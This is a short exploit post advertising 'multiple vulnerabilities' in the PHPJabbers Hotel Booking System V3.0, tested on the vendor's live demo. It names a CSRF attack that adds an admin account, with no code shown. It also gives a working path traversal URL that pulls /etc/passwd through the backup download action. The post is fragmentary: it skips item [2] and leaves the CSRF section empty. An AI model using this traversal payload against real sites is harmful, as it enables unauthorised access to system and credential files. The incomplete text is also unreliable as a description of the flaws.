Hotel Booking System V3.0 - Multiple Vulnerabilties ==================================================================== #################################################################### .:. Author : HackXBack .:. Contact : h-b@usa.com .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpjabbers.com/hotels-booking-system/ .:. Tested On Demo : http://www.phpjabbers.com/demo/hb_30/1389729077/index.php?controller=pjAdmin&action=pjActionLogin #################################################################### ===[ Exploit ]=== [1] Cross Site Request Forgery ============================== [Add Admin]
[3] Local File disclure ======================== http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd ####################################################################